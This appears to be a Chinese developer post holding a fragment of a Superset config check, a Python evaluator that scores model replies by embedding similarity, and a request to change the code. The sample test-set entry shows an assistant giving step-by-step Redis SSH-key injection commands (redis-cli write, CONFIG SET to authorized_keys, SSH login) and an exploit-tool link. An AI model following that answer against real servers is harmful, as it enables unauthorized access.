"TRUSTED_DOMAINS"]) for var in required_env_vars: if not os.getenv(var): errors.append(f"缺少必需的环境变量: {var}") # 安全配置检查 if IS_PRODUCTION and CORS_ORIGIN_ALLOW_ALL: errors.append("生产环境不应允许所有来源的CORS请求") if errors: raise ValueError(f"配置验证失败:\n" + "\n".join(f" - {error}" for error in errors)) # 执行配置验证 try: validate_config() print(f"🚀 Superset配置加载完成 - 环境: {ENVIRONMENT}") print(f" 数据库: {DB_HOST}:{DB_PORT}/{DB_NAME}") print(f" 认证: LDAP混合模式") print(f" 缓存: {'Redis' if IS_PRODUCTION else 'Simple'}") print(f" 日志级别: {LOG_LEVEL}") except ValueError as e: print(f"❌ 配置验证失败: {e}") if IS_PRODUCTION: raise # 生产环境严格要求 else: print("⚠️ 开发环境忽略配置错误")

filetype

import os import json import torch from tqdm import tqdm from transformers import AutoTokenizer, AutoModelForCausalLM from sentence_transformers import SentenceTransformer, util class DialogueEvaluator: def __init__(self, test_data_path: str, embed_model_path: str = "shibing624/text2vec-base-chinese", gen_model_path: str = None, similarity_threshold: float = 0.75, device: str = "cuda" if torch.cuda.is_available() else "cpu"): """ 初始化对话评估器 参数: test_data_path: 测试数据集路径(JSON格式) embed_model_path: 文本嵌入模型路径 gen_model_path: 生成模型路径(可选) similarity_threshold: 语义相似度阈值 device: 计算设备(cuda/cpu) """ self.device = device self.similarity_threshold = similarity_threshold # 加载测试数据 with open(test_data_path, 'r', encoding='utf-8') as f: self.test_data = json.load(f) # 加载文本嵌入模型 print("加载文本嵌入模型...") self.embed_model = SentenceTransformer( embed_model_path, device=self.device ) # 初始化生成模型状态 self.gen_model_loaded = False self.gen_tokenizer = None self.gen_model = None # 尝试加载生成模型 if gen_model_path and os.path.exists(gen_model_path): print(f"尝试加载生成模型: {gen_model_path}...") try: self.gen_tokenizer = AutoTokenizer.from_pretrained( gen_model_path, trust_remote_code=True, local_files_only=True ) self.gen_model = AutoModelForCausalLM.from_pretrained( gen_model_path, device_map="auto", torch_dtype=torch.float16 if device=="cuda" else torch.float32, trust_remote_code=True, local_files_only=True ).eval() self.gen_model_loaded = True print("✅ 生成模型加载成功") except Exception as e: print(f"❌ 生成模型加载失败: {str(e)}") def get_embedding(self, text: str) -> torch.Tensor: """获取文本的嵌入向量""" return self.embed_model.encode(text, convert_to_tensor=True) def generate_response(self, prompt: str) -> str: """使用生成模型生成回复""" if not self.gen_model_loaded: return "[未加载模型]" inputs = self.gen_tokenizer( prompt, return_tensors="pt" ).to(self.device) outputs = self.gen_model.generate( **inputs, max_new_tokens=256, temperature=0.7, top_p=0.9, do_sample=True ) return self.gen_tokenizer.decode( outputs[0], skip_special_tokens=True ).replace(prompt, "") def evaluate_pair(self, text1: str, text2: str) -> dict: """ 评估文本对相似度 返回: { "text1": str, "text2": str, "similarity": float, "is_correct": bool, "match_type": str } """ # 完全匹配检测 if text1.strip() == text2.strip(): return { "text1": text1, "text2": text2, "similarity": 1.0, "is_correct": True, "match_type": "exact" } # 语义相似度计算 emb1 = self.get_embedding(text1[:512]) emb2 = self.get_embedding(text2[:512]) # 计算余弦相似度: $ \text{similarity} = \cos(\theta) = \frac{\vec{A} \cdot \vec{B}}{\|\vec{A}\| \times \|\vec{B}\|} $ similarity = util.pytorch_cos_sim( emb1.unsqueeze(0), emb2.unsqueeze(0) ).item() return { "text1": text1, "text2": text2, "similarity": similarity, "is_correct": similarity >= self.similarity_threshold, "match_type": "semantic" } def evaluate(self, output_path: str = "evaluation_results.json"): """执行完整评估流程""" results = [] total_correct = 0 for sample in tqdm(self.test_data, desc="评估进度"): prompt = sample["instruction"] reference = sample["reference"] # 生成回复 try: generated = self.generate_response(prompt) except Exception as e: print(f"⚠️ 生成失败: {str(e)}") generated = "[生成失败]" # 评估生成的回复 eval_result = self.evaluate_pair(reference, generated) # 统计结果 if eval_result["is_correct"]: total_correct += 1 results.append({ "instruction": prompt, "reference": reference, "generated": generated, **eval_result }) # 计算准确率 accuracy = total_correct / len(results) summary = { "total_samples": len(results), "accuracy": accuracy, "correct_count": total_correct, "similarity_threshold": self.similarity_threshold, "gen_model_loaded": self.gen_model_loaded } # 保存结果 final_results = { "summary": summary, "details": results } with open(output_path, 'w', encoding='utf-8') as f: json.dump(final_results, f, ensure_ascii=False, indent=2) print(f"\n✅ 评估完成! 准确率: {accuracy:.2%}") print(f"📊 结果已保存至: {output_path}") return final_results # =============== 使用示例 =============== if __name__ == "__main__": # 初始化评估器 evaluator = DialogueEvaluator( test_data_path="test_data.json", # 包含{instruction, reference}的测试数据 gen_model_path="path/to/generation_model",# 可选生成模型路径 embed_model_path="text_embedding_model", # 文本嵌入模型 similarity_threshold=0.75 # 相似度阈值 ) # 执行评估 results = evaluator.evaluate(output_path="eval_results.json") # 打印摘要 print("\n评估摘要:") print(json.dumps(results["summary"], indent=2)) 测试集格式为: { "conversations": [ { "from": "user", "value": "如何通过SSH密钥注入获取Redis服务器访问权限?" }, { "from": "assistant", "value": "前提条件:目标Redis实例允许匿名访问,已知Web目录路径为/var/www/html\n\n分步SSH密钥注入方法:\n\n1. **生成SSH密钥对**:\n```bash\nssh-keygen -t rsa -f redis_key\n```\n2. **格式化公钥并上传**:\n```bash\n(echo -e \"\\n\\n\"; cat redis_key.pub; echo -e \"\\n\\n\") | redis-cli -h 10.10.10.10 -x set ssh_key\n```\n3. **配置Redis存储路径**:\n```redis\nCONFIG SET dir /home/redis/.ssh\nCONFIG SET dbfilename \"authorized_keys\"\nSAVE\n```\n4. **SSH连接验证**:\n```bash\nssh -i redis_key [email protected]\n```\n自动化工具推荐:https://github.com/Avinash-acid/Redis-Server-Exploit" } ] } 修改一下代码

DeepIndaba
  • 粉丝: 45
上传资源 快速赚钱